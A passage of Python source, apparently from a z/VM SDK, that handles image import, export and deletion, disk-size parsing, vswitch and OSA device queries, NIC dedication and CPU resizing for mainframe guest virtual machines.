expect_md5sum = image_meta.get('md5sum')
real_md5sum = self._get_md5sum(import_image_fpath)
if expect_md5sum and expect_md5sum != real_md5sum:
msg = ("The md5sum after import is not same as source image,"
" the image has been broken")
LOG.error(msg)
raise exception.SDKImageOperationError(rs=4)
# After import to image repository, figure out the image type is
# single disk image or multiple-disk image,if multiple disks image,
# extract it, if it's single image, rename its name to be same as
# specific vdev
# TODO: (nafei) use sub-function to check the image type
image_type = 'rootonly'
if image_type == 'rootonly':
final_image_fpath = '/'.join([target_folder,
CONF.zvm.user_root_vdev])
os.rename(import_image_fpath, final_image_fpath)
elif image_type == 'alldisks':
# For multiple disks image, extract it, after extract, the
# content under image folder is like: 0100, 0101, 0102
# and remove the image file 0100-0101-0102.tgz
pass
# TODO: put multiple disk image into consideration, update the
# disk_size_units and image_size db field
if not self.is_rhcos(image_os_version):
disk_size_units = self._get_disk_size_units(final_image_fpath)
else:
disk_size_units = self._get_disk_size_units_rhcos(
final_image_fpath)
image_size = self._get_image_size(final_image_fpath)
# TODO: update the real_md5sum field to include each disk image
self._ImageDbOperator.image_add_record(image_name,
image_os_version,
real_md5sum,
disk_size_units,
image_size,
image_type,
comments=comments)
LOG.info("Image %s is import successfully" % image_name)
except Exception:
# Cleanup the image from image repository
self._pathutils.clean_temp_folder(target_folder)
raise
def image_export(self, image_name, dest_url, remote_host=None):
"""Export the specific image to remote host or local file system
:param image_name: image name that can be uniquely identify an image
:param dest_path: the location to store exported image, eg.
/opt/images, the image will be stored in folder
/opt/images/
:param remote_host: the server that export image to, the format is
username@IP eg. nova@192.168.99.1, if remote_host is
None, it means the image will be stored in local server
:returns a dictionary that contains the exported image info
{
'image_name': the image_name that exported
'image_path': the image_path after exported
'os_version': the os version of the exported image
'md5sum': the md5sum of the original image
'comments': the comments of the original image
}
"""
image_info = self._ImageDbOperator.image_query_record(image_name)
if not image_info:
msg = ("The image %s does not exist in image repository"
% image_name)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=20, img=image_name)
image_type = image_info[0]['type']
# TODO: (nafei) according to image_type, detect image exported path
# For multiple disk image, make the tgz firstly, the specify the
# source_path to be something like: 0100-0101-0102.tgz
if image_type == 'rootonly':
source_path = '/'.join([CONF.image.sdk_image_repository,
const.IMAGE_TYPE['DEPLOY'],
image_info[0]['imageosdistro'],
image_name,
CONF.zvm.user_root_vdev])
else:
pass
self._scheme2backend(urlparse.urlparse(dest_url).scheme).image_export(
source_path, dest_url,
remote_host=remote_host)
# TODO: (nafei) for multiple disks image, update the expect_dict
# to be the tgz's md5sum
export_dict = {'image_name': image_name,
'image_path': dest_url,
'os_version': image_info[0]['imageosdistro'],
'md5sum': image_info[0]['md5sum'],
'comments': image_info[0]['comments']}
LOG.info("Image %s export successfully" % image_name)
return export_dict
def _get_image_disk_size_units(self, image_path):
""" Return a comma separated string to indicate the image disk size
and units for each image disk file under image_path
For single disk image , it looks like: 0100=3338:CYL
For multiple disk image, it looks like:
0100=3338:CYL,0101=4194200:BLK, 0102=4370:CYL"""
pass
def _get_disk_size_units(self, image_path):
command = 'hexdump -n 48 -C %s' % image_path
(rc, output) = zvmutils.execute(command)
LOG.debug("hexdump result is %s" % output)
if rc:
msg = ("Error happened when executing command hexdump with"
"reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=5)
try:
root_disk_size = int(output[144:156])
disk_units = output[220:223]
root_disk_units = ':'.join([str(root_disk_size), disk_units])
except ValueError:
msg = ("Image file at %s is missing built-in disk size "
"metadata, it was probably not captured by SDK" %
image_path)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=6)
if 'FBA' not in output and 'CKD' not in output:
raise exception.SDKImageOperationError(rs=7)
LOG.debug("The image's root_disk_units is %s" % root_disk_units)
return root_disk_units
def _get_disk_size_units_rhcos(self, image_path):
command = "fdisk -b 4096 -l %s | head -2 | awk '{print $5}'" % (
image_path)
rc = 0
output = ""
try:
# shell should be set True because it is a shell command with
# pipeline, so can not use utils.execute function here
output = subprocess.check_output(command, shell=True,
stderr=subprocess.STDOUT)
output = bytes.decode(output)
except subprocess.CalledProcessError as err:
rc = err.returncode
output = err.output
except Exception as err:
err_msg = ('Command "%s" Error: %s' % (' '.join(command),
str(err)))
raise exception.SDKInternalError(msg=err_msg)
if rc or output.strip('1234567890*\n'):
msg = ("Error happened when executing command fdisk with "
"reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=8)
image_size = output.split()[0]
try:
cyl = (float(image_size)) / 737280
cyl = str(int(math.ceil(cyl)))
except Exception:
msg = ("Failed to convert %s to a number of cylinders."
% image_size)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=14, msg=msg)
disk_units = "CYL"
root_disk_units = ':'.join([str(cyl), disk_units])
LOG.debug("The image's root_disk_units is %s" % root_disk_units)
return root_disk_units
def _get_image_size(self, image_path):
"""Return disk size in bytes"""
command = 'du -b %s' % image_path
(rc, output) = zvmutils.execute(command)
if rc:
msg = ("Error happened when executing command du -b with"
"reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=8)
size = output.split()[0]
return size
def _get_image_path_by_name(self, image_name):
try:
target_info = self._ImageDbOperator.image_query_record(image_name)
except exception.SDKObjectNotExistError:
msg = ("The image %s does not exist in image repository"
% image_name)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=20, img=image_name)
# TODO: (nafei) Handle multiple disks image deploy
image_path = '/'.join([CONF.image.sdk_image_repository,
const.IMAGE_TYPE['DEPLOY'],
target_info[0]['imageosdistro'],
image_name])
return image_path
def _scheme2backend(self, scheme):
try:
return {
"file": FilesystemBackend,
"http": HTTPBackend,
# "https": HTTPSBackend
}[scheme]
except KeyError:
msg = ("No backend found for '%s'" % scheme)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=2, schema=scheme)
def _get_md5sum(self, fpath):
"""Calculate the md5sum of the specific image file"""
try:
current_md5 = hashlib.md5()
if isinstance(fpath, six.string_types) and os.path.exists(fpath):
with open(fpath, "rb") as fh:
for chunk in self._read_chunks(fh):
current_md5.update(chunk)
elif (fpath.__class__.__name__ in ["StringIO", "StringO"] or
isinstance(fpath, IOBase)):
for chunk in self._read_chunks(fpath):
current_md5.update(chunk)
else:
return ""
return current_md5.hexdigest()
except Exception:
msg = ("Failed to calculate the image's md5sum")
LOG.error(msg)
raise exception.SDKImageOperationError(rs=3)
def _read_chunks(self, fh):
fh.seek(0)
chunk = fh.read(CHUNKSIZE)
while chunk:
yield chunk
chunk = fh.read(CHUNKSIZE)
else:
fh.seek(0)
def image_delete(self, image_name):
# Delete image file
try:
self._delete_image_file(image_name)
# Delete image record from db
self._ImageDbOperator.image_delete_record(image_name)
except exception.SDKImageOperationError as err:
results = err.results
if ((results['rc'] == 300) and (results['rs'] == 20)):
LOG.warning("Image %s does not exist", image_name)
return
else:
LOG.error("Failed to delete image %s, error: %s" %
(image_name, err.format_message()))
raise
msg = ('Delete image %s successfully' % image_name)
LOG.info(msg)
def _delete_image_file(self, image_name):
image_path = self._get_image_path_by_name(image_name)
self._pathutils.clean_temp_folder(image_path)
def _get_image_last_access_time(self, image_name, raise_exception=True):
"""Get the last access time of the image."""
image_file = os.path.join(self._get_image_path_by_name(image_name),
CONF.zvm.user_root_vdev)
if not os.path.exists(image_file):
if raise_exception:
msg = 'Failed to get time stamp of image:%s' % image_name
LOG.error(msg)
raise exception.SDKImageOperationError(rs=23, img=image_name)
else:
# An invalid timestamp
return -1
atime = os.path.getatime(image_file)
return atime
def image_query(self, image_name=None):
image_info = self._ImageDbOperator.image_query_record(image_name)
if not image_info:
# because database maybe None, so return nothing here
return []
# if image_name is not None, means there is only one record
if image_name:
last_access_time = self._get_image_last_access_time(
image_name, raise_exception=False)
image_info[0]['last_access_time'] = last_access_time
else:
for item in image_info:
image_name = item['imagename']
# set raise_exception to false because one failed
# may stop processing all the items in the list
last_access_time = self._get_image_last_access_time(
image_name, raise_exception=False)
item['last_access_time'] = last_access_time
return image_info
def image_get_root_disk_size(self, image_name):
"""Return the root disk units of the specified image
image_name: the unique image name in db
Return the disk units in format like 3339:CYL or 467200:BLK
"""
image_info = self.image_query(image_name)
if not image_info:
raise exception.SDKImageOperationError(rs=20, img=image_name)
disk_size_units = image_info[0]['disk_size_units'].split(':')[0]
return disk_size_units
def image_get_os_distro(self, image_name):
"""
Return the operating system distro of the specified image
"""
image_info = self._ImageDbOperator.image_query_record(image_name)
if not image_info:
raise exception.SDKImageOperationError(rs=20, img=image_name)
os_distro = image_info[0]['imageosdistro']
return os_distro
def _get_image_disk_type(self, image_name):
"""
Return image disk type
"""
image_info = self._ImageDbOperator.image_query_record(image_name)
if ((image_info[0]['comments'] is not None) and
(image_info[0]['comments'].__contains__('disk_type'))):
image_disk_type = eval(image_info[0]['comments'])['disk_type']
if image_disk_type == 'DASD':
return 'ECKD'
elif image_disk_type == 'SCSI':
return 'SCSI'
else:
return None
else:
return None
def punch_file(self, userid, fn, fclass):
rd = ("changevm %(uid)s punchfile %(file)s --class %(class)s" %
{'uid': userid, 'file': fn, 'class': fclass})
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to punch file to userid '%s',"
"error: %s" % (userid, err.format_message()))
raise
finally:
os.remove(fn)
def get_guest_connection_status(self, userid):
'''Get guest vm connection status.'''
rd = ' '.join(('getvm', userid, 'isreachable'))
results = self._request(rd)
if results['rs'] == 1:
return True
else:
return False
def _generate_disk_parmline(self, vdev, fmt, mntdir):
parms = [
'action=' + 'addMdisk',
'vaddr=' + vdev,
'filesys=' + fmt,
'mntdir=' + mntdir
]
parmline = ' '.join(parms)
parmstr = "'" + parmline + "'"
return parmstr
def process_additional_minidisks(self, userid, disk_info):
'''Generate and punch the scripts used to process additional disk into
target vm's reader.
'''
for idx, disk in enumerate(disk_info):
vdev = disk.get('vdev') or self.generate_disk_vdev(
offset = (idx + 1))
fmt = disk.get('format')
mount_dir = disk.get('mntdir') or ''.join(['/mnt/ephemeral',
str(vdev)])
# the mount point of swap partition is swap
if fmt == "swap":
mount_dir = "swap"
disk_parms = self._generate_disk_parmline(vdev, fmt, mount_dir)
func_name = '/var/lib/zvmsdk/setupDisk'
self.aemod_handler(userid, func_name, disk_parms)
# trigger do-script
if self.get_power_state(userid) == 'on':
self.execute_cmd(userid, "/usr/bin/zvmguestconfigure start")
def aemod_handler(self, instance_name, func_name, parms):
rd = ' '.join(['changevm', instance_name, 'aemod', func_name,
'--invparms', parms])
action = parms[0] + instance_name
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_user_console_output(self, userid):
# get console into reader
rd = 'getvm %s consoleoutput' % userid
action = 'get console log reader file list for guest vm: %s' % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
resp = self._request(rd)
with zvmutils.expect_invalid_resp_data(resp):
rf_list = resp['response'][0].rpartition(':')[2].strip().split()
# TODO: make sure reader device is online
# via 'cat /sys/bus/ccw/drivers/vmur/0.0.000c/online'
# 'sudo /sbin/cio_ignore -r 000c; sudo /sbin/chccwdev -e 000c'
# 'which udevadm &> /dev/null && udevadm settle || udevsettle'
logs = []
for rf in rf_list:
cmd = 'sudo /usr/sbin/vmur re -t -O %s' % rf
rc, output = zvmutils.execute(cmd)
if rc == 0:
logs.append(output)
return ''.join(logs)
def query_vswitch(self, switch_name):
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Query_Extended" %
smt_userid,
"--operands",
'-k switch_name=%s' % switch_name
))
try:
results = self._request(rd)
rd_list = results['response']
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 212) and (err.results['rs'] == 40)):
msg = 'Vswitch %s does not exist' % switch_name
LOG.error(msg)
obj_desc = "Vswitch %s" % switch_name
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
else:
action = "query vswitch details info"
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
vsw_info = {}
with zvmutils.expect_invalid_resp_data():
# ignore user_vlan_id part and jump to the vswitch basic info
idx_end = len(rd_list)
idx = 0
while((idx < idx_end) and
not rd_list[idx].__contains__('switch_name')):
idx = idx + 1
# The next 21 lines contains the vswitch basic info
# eg, name, type, port_type, vlan_awareness, etc
for i in range(21):
rd = rd_list[idx + i].split(':')
vsw_info[rd[0].strip()] = rd[1].strip()
idx = idx + 21
# Skip the vepa_status
while((idx < idx_end) and
not rd_list[idx].__contains__('real_device_address') and
not rd_list[idx].__contains__('port_num') and
not rd_list[idx].__contains__('adapter_owner')):
idx = idx + 1
def _parse_value(data_list, idx, keyword, offset=1):
value = data_list[idx].rpartition(keyword)[2].strip()
if value == '(NONE)':
value = 'NONE'
return idx + offset, value
def _parse_dev_status(value):
if value in const.DEV_STATUS.keys():
return const.DEV_STATUS[value]
else:
return 'Unknown'
def _parse_dev_err(value):
if value in const.DEV_ERROR.keys():
return const.DEV_ERROR[value]
else:
return 'Unknown'
# Start to analyse the real devices info
vsw_info['real_devices'] = {}
while((idx < idx_end) and
rd_list[idx].__contains__('real_device_address')):
# each rdev has 6 lines' info
idx, rdev_addr = _parse_value(rd_list, idx,
'real_device_address: ')
idx, vdev_addr = _parse_value(rd_list, idx,
'virtual_device_address: ')
idx, controller = _parse_value(rd_list, idx,
'controller_name: ')
idx, port_name = _parse_value(rd_list, idx, 'port_name: ')
idx, dev_status = _parse_value(rd_list, idx,
'device_status: ')
idx, dev_err = _parse_value(rd_list, idx,
'device_error_status ')
vsw_info['real_devices'][rdev_addr] = {'vdev': vdev_addr,
'controller': controller,
'port_name': port_name,
'dev_status':
_parse_dev_status(
dev_status),
'dev_err': _parse_dev_err(
dev_err)
}
# Under some case there would be an error line in the output
# "Error controller_name is NULL!!", skip this line
if ((idx < idx_end) and
rd_list[idx].__contains__(
'Error controller_name is NULL!!')):
idx += 1
# Start to get the authorized userids
vsw_info['authorized_users'] = {}
while((idx < idx_end) and rd_list[idx].__contains__('port_num')):
# each authorized userid has 6 lines' info at least
idx, port_num = _parse_value(rd_list, idx,
'port_num: ')
idx, userid = _parse_value(rd_list, idx,
'grant_userid: ')
idx, prom_mode = _parse_value(rd_list, idx,
'promiscuous_mode: ')
idx, osd_sim = _parse_value(rd_list, idx, 'osd_sim: ')
idx, vlan_count = _parse_value(rd_list, idx,
'vlan_count: ')
vlan_ids = []
for i in range(int(vlan_count)):
idx, id = _parse_value(rd_list, idx,
'user_vlan_id: ')
vlan_ids.append(id)
# For vlan unaware vswitch, the query smcli would
# return vlan_count as 1, here we just set the count to 0
if (vsw_info['vlan_awareness'] == 'UNAWARE'):
vlan_count = 0
vlan_ids = []
vsw_info['authorized_users'][userid] = {
'port_num': port_num,
'prom_mode': prom_mode,
'osd_sim': osd_sim,
'vlan_count': vlan_count,
'vlan_ids': vlan_ids
}
# Start to get the connected adapters info
# OWNER_VDEV would be used as the dict key for each adapter
vsw_info['adapters'] = {}
while((idx < idx_end) and
rd_list[idx].__contains__('adapter_owner')):
# each adapter has four line info: owner, vdev, macaddr, type
idx, owner = _parse_value(rd_list, idx,
'adapter_owner: ')
idx, vdev = _parse_value(rd_list, idx,
'adapter_vdev: ')
idx, mac = _parse_value(rd_list, idx,
'adapter_macaddr: ')
idx, type = _parse_value(rd_list, idx, 'adapter_type: ')
key = owner + '_' + vdev
vsw_info['adapters'][key] = {
'mac': mac,
'type': type
}
# Todo: analyze and add the uplink NIC info and global member info
def _parse_switch_status(value):
if value in const.SWITCH_STATUS.keys():
return const.SWITCH_STATUS[value]
else:
return 'Unknown'
if 'switch_status' in vsw_info.keys():
vsw_info['switch_status'] = _parse_switch_status(
vsw_info['switch_status'])
return vsw_info
def get_nic_info(self, userid=None, nic_id=None, vswitch=None):
nic_info = self._NetDbOperator.switch_select_record(userid=userid,
nic_id=nic_id, vswitch=vswitch)
return nic_info
def is_first_network_config(self, userid):
action = "get guest '%s' to database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
info = self._GuestDbOperator.get_guest_by_userid(userid)
# check net_set
if int(info[3]) == 0:
return True
else:
return False
def update_guestdb_with_net_set(self, userid):
action = "update guest '%s' in database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._GuestDbOperator.update_guest_by_userid(userid, net_set='1')
def _is_OSA_free(self, OSA_device):
osa_info = self._query_OSA()
if 'OSA' not in osa_info.keys():
return False
elif len(osa_info['OSA']['FREE']) == 0:
return False
else:
dev1 = str(OSA_device).zfill(4).upper()
dev2 = str(str(hex(int(OSA_device, 16) + 1))[2:]).zfill(4).upper()
dev3 = str(str(hex(int(OSA_device, 16) + 2))[2:]).zfill(4).upper()
if ((dev1 in osa_info['OSA']['FREE']) and
(dev2 in osa_info['OSA']['FREE']) and
(dev3 in osa_info['OSA']['FREE'])):
return True
else:
return False
def _query_OSA(self):
smt_userid = zvmutils.get_smt_userid()
rd = "SMAPI %s API Virtual_Network_OSA_Query" % smt_userid
OSA_info = {}
try:
results = self._request(rd)
rd_list = results['response']
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 4) and (err.results['rs'] == 4)):
msg = 'No OSAs on system'
LOG.info(msg)
return OSA_info
else:
action = "query OSA details info"
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
with zvmutils.expect_invalid_resp_data():
idx_end = len(rd_list)
idx = 0
def _parse_value(data_list, idx, keyword, offset=1):
value = data_list[idx].rpartition(keyword)[2].strip()
return idx + offset, value
# Start to analyse the osa devices info
while((idx < idx_end) and
rd_list[idx].__contains__('OSA Address')):
idx, osa_addr = _parse_value(rd_list, idx,
'OSA Address: ')
idx, osa_status = _parse_value(rd_list, idx,
'OSA Status: ')
idx, osa_type = _parse_value(rd_list, idx,
'OSA Type: ')
if osa_type != 'UNKNOWN':
idx, CHPID_addr = _parse_value(rd_list, idx,
'CHPID Address: ')
idx, Agent_status = _parse_value(rd_list, idx,
'Agent Status: ')
if osa_type not in OSA_info.keys():
OSA_info[osa_type] = {}
OSA_info[osa_type]['FREE'] = []
OSA_info[osa_type]['BOXED'] = []
OSA_info[osa_type]['OFFLINE'] = []
OSA_info[osa_type]['ATTACHED'] = []
if osa_status.__contains__('ATT'):
id = osa_status.split()[1]
item = (id, osa_addr)
OSA_info[osa_type]['ATTACHED'].append(item)
else:
OSA_info[osa_type][osa_status].append(osa_addr)
return OSA_info
def _get_available_vdev(self, userid, vdev=None):
ports_info = self._NetDbOperator.switch_select_table()
vdev_info = []
for p in ports_info:
if p['userid'] == userid.upper():
vdev_info.append(p['interface'])
if len(vdev_info) == 0:
# no nic defined for the guest
if vdev is None:
nic_vdev = CONF.zvm.default_nic_vdev
else:
nic_vdev = vdev
else:
if vdev is None:
used_vdev = max(vdev_info)
nic_vdev = str(hex(int(used_vdev, 16) + 3))[2:]
else:
if self._is_vdev_valid(vdev, vdev_info):
nic_vdev = vdev
else:
errmsg = ("The specified virtual device number %s "
"has already been used." % vdev)
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
if ((len(nic_vdev) > 4) or
(len(str(hex(int(nic_vdev, 16) + 2))[2:]) > 4)):
errmsg = ("Virtual device number %s is not valid" % nic_vdev)
raise exception.SDKInvalidInputFormat(msg=errmsg)
return nic_vdev
def dedicate_OSA(self, userid, OSA_device, vdev=None, active=False):
nic_vdev = self._get_available_vdev(userid, vdev=vdev)
if not self._is_OSA_free(OSA_device):
errmsg = ("The specified OSA device number %s "
"is not free" % OSA_device)
raise exception.SDKConflictError(modID='network', rs=14,
osa=OSA_device, userid=userid,
msg=errmsg)
LOG.debug('Nic attributes: vdev is %(vdev)s, '
'dedicated OSA device is %(osa)s',
{'vdev': nic_vdev,
'osa': OSA_device})
self._dedicate_OSA(userid, OSA_device, nic_vdev, active=active)
return nic_vdev
def _dedicate_OSA_inactive_exception(self, error, userid, vdev,
OSA_device):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=15,
osa=OSA_device, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKConflictError(modID='network', rs=15,
osa=OSA_device, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 4)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=14,
osa=OSA_device, userid=userid,
msg=errmsg)
else:
raise error
def _dedicate_OSA_active_exception(self, error, userid, OSA_device):
if (((error.results['rc'] == 204) and (error.results['rs'] == 4)) or
((error.results['rc'] == 204) and (error.results['rs'] == 8)) or
((error.results['rc'] == 204) and (error.results['rs'] == 16))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=14,
osa=OSA_device, userid=userid,
msg=errmsg)
else:
raise error
def _dedicate_OSA(self, userid, OSA_device, vdev, active=False):
if active:
self._is_active(userid)
msg = ('Start to dedicate nic device %(vdev)s of guest %(vm)s '
'to OSA device %(osa)s'
% {'vdev': vdev, 'vm': userid, 'osa': OSA_device})
LOG.info(msg)
def_vdev = vdev
att_OSA_device = OSA_device
for i in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Dedicate_DM' %
userid,
"--operands",
"-v %s" % def_vdev,
"-r %s" % att_OSA_device))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
LOG.error("Failed to dedicate OSA %s to nic %s for user %s "
"in the guest's user direct, error: %s" %
(att_OSA_device, def_vdev, userid,
err.format_message()))
# TODO revoke the dedicated OSA in user direct
while (int(def_vdev, 16) != int(vdev, 16)):
def_vdev = str(hex(int(def_vdev, 16) - 1))[2:]
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate_DM' %
userid,
"--operands",
"-v %s" % def_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
if ((err2.results['rc'] == 404) and
(err2.results['rs'] == 8)):
pass
else:
LOG.error("Failed to Undedicate nic %s for user"
" %s in the guest's user direct, "
"error: %s" %
(def_vdev, userid,
err2.format_message()))
pass
self._dedicate_OSA_inactive_exception(err, userid, vdev,
OSA_device)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
att_OSA_device = str(hex(int(att_OSA_device, 16) + 1))[2:]
if active:
def_vdev = vdev
att_OSA_device = OSA_device
for i in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Dedicate' %
userid,
"--operands",
"-v %s" % def_vdev,
"-r %s" % att_OSA_device))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
LOG.error("Failed to dedicate OSA %s to nic %s for user "
"%s on the active guest system, error: %s" %
(att_OSA_device, def_vdev, userid,
err.format_message()))
# TODO revoke the dedicated OSA in user direct and active
detach_vdev = vdev
for j in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate_DM' %
userid,
"--operands",
"-v %s" % detach_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
if ((err2.results['rc'] == 404) and
(err2.results['rs'] == 8)):
pass
else:
LOG.error("Failed to Undedicate nic %s for "
"user %s in the guest's user "
"direct, error: %s" %
(def_vdev, userid,
err2.format_message()))
pass
detach_vdev = str(hex(int(detach_vdev, 16) + 1))[2:]
while (int(def_vdev, 16) != int(vdev, 16)):
def_vdev = str(hex(int(def_vdev, 16) - 1))[2:]
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate' %
userid,
"--operands",
"-v %s" % def_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err3:
if ((err3.results['rc'] == 204) and
(err3.results['rs'] == 8)):
pass
else:
LOG.error("Failed to Undedicate nic %s for "
"user %s on the active guest "
"system, error: %s" %
(def_vdev, userid,
err3.format_message()))
pass
self._dedicate_OSA_active_exception(err, userid,
OSA_device)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
att_OSA_device = str(hex(int(att_OSA_device, 16) + 1))[2:]
OSA_desc = 'OSA=%s' % OSA_device
self._NetDbOperator.switch_add_record(userid, vdev, comments=OSA_desc)
msg = ('Dedicate nic device %(vdev)s of guest %(vm)s '
'to OSA device %(osa)s successfully'
% {'vdev': vdev, 'vm': userid, 'osa': OSA_device})
LOG.info(msg)
def _undedicate_nic_active_exception(self, error, userid, vdev):
if ((error.results['rc'] == 204) and (error.results['rs'] == 44)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=16,
userid=userid, vdev=vdev,
msg=errmsg)
else:
raise error
def _undedicate_nic_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=17,
userid=userid, vdev=vdev,
obj=obj_desc)
else:
raise error
def _undedicate_nic(self, userid, vdev, active=False,
del_active_only=False):
if active:
self._is_active(userid)
msg = ('Start to undedicate nic device %(vdev)s of guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
if not del_active_only:
def_vdev = vdev
for i in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate_DM' %
userid,
"--operands",
"-v %s" % def_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 404) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist in "
"the guest's user direct", vdev)
else:
LOG.error("Failed to undedicate nic %s for %s in "
"the guest's user direct, error: %s" %
(vdev, userid, emsg))
self._undedicate_nic_inactive_exception(err, userid, vdev)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
self._NetDbOperator.switch_delete_record_for_nic(userid, vdev)
if active:
def_vdev = vdev
for i in range(3):
rd = ' '.join((
"SMAPI %s API Image_Device_Undedicate" %
userid,
"--operands",
'-v %s' % def_vdev))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 204) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist on "
"the active guest system", vdev)
else:
LOG.error("Failed to undedicate nic %s for %s on "
"the active guest system, error: %s" %
(vdev, userid, emsg))
self._undedicate_nic_active_exception(err, userid,
vdev)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
msg = ('Undedicate nic device %(vdev)s of guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def _request_with_error_ignored(self, rd):
"""Send smt request, log and ignore any errors."""
try:
return self._request(rd)
except Exception as err:
# log as warning and ignore namelist operation failures
LOG.warning(six.text_type(err))
def namelist_add(self, namelist, userid):
rd = ''.join(("SMAPI %s API Name_List_Add " % namelist,
"--operands -n %s" % userid))
self._request_with_error_ignored(rd)
def namelist_remove(self, namelist, userid):
rd = ''.join(("SMAPI %s API Name_List_Remove " % namelist,
"--operands -n %s" % userid))
self._request_with_error_ignored(rd)
def namelist_query(self, namelist):
rd = "SMAPI %s API Name_List_Query" % namelist
resp = self._request_with_error_ignored(rd)
if resp is not None:
return resp['response']
else:
return []
def namelist_destroy(self, namelist):
rd = "SMAPI %s API Name_List_Destroy" % namelist
self._request_with_error_ignored(rd)
def _get_defined_cpu_addrs(self, userid):
user_direct = self.get_user_direct(userid)
defined_addrs = []
max_cpus = 0
for ent in user_direct:
if ent.startswith("CPU"):
cpu_addr = ent.split()[1].strip().upper()
defined_addrs.append(cpu_addr)
if ent.startswith("MACHINE ESA"):
max_cpus = int(ent.split()[2].strip())
return (max_cpus, defined_addrs)
def _get_available_cpu_addrs(self, used_addrs, max_cpus):
# Get available CPU addresses that are not defined in user entry
used_set = set(used_addrs)
available_addrs = set([hex(i)[2:].rjust(2, '0').upper()
for i in range(0, max_cpus)])
available_addrs.difference_update(used_set)
return list(available_addrs)
def _get_active_cpu_addrs(self, userid):
# Get the active cpu addrs in two-digit hex string in upper case
# Sample output for 'lscpu --parse=ADDRESS':
# # The following is the parsable format, which can be fed to other
# # programs. Each different item in every column has an unique ID
# # starting from zero.
# # Address
# 0
# 1
active_addrs = []
active_cpus = self.execute_cmd(userid, "lscpu --parse=ADDRESS")
for c in active_cpus:
# Skip the comment lines at beginning
if c.startswith("# "):
continue
addr = hex(int(c.strip()))[2:].rjust(2, '0').upper()
active_addrs.append(addr)
return active_addrs
def resize_cpus(self, userid, count):
# Check defined cpus in user entry. If greater than requested, then
# delete cpus. Otherwise, add new cpus.
# Return value: for revert usage, a tuple of
# action: The action taken for this resize, possible values:
# 0: no action, 1: add cpu, 2: delete cpu
# cpu_addrs: list of influenced cpu addrs
action = 0
updated_addrs = []
(max_cpus, defined_addrs) = self._get_defined_cpu_addrs(userid)
defined_count = len(defined_addrs)
# Check maximum cpu count defined
if max_cpus == 0:
LOG.error("Resize for guest '%s' cann't be done. The maximum "
"number of cpus is not defined in user directory." %
userid)
raise exception.SDKConflictError(modID='guest', rs=3,
userid=userid)
# Check requested count is less than the maximum cpus
if count > max_cpus:
LOG.error("Resize for guest '%s' cann't be done. The "
"requested number of cpus: '%i' exceeds the maximum "
"number of cpus allowed: '%i'." %
(userid, count, max_cpus))
raise exception.SDKConflictError(modID='guest', rs=4,
userid=userid,
req=count, max=max_cpus)
# Check count and take action
if defined_count == count:
LOG.info("The number of current defined CPUs in user '%s' equals "
"to requested count: %i, no action for static resize"
"needed." % (userid, count))
return (action, updated_addrs, max_cpus)
elif defined_count < count:
action = 1
# add more CPUs
available_addrs = self._get_available_cpu_addrs(defined_addrs,
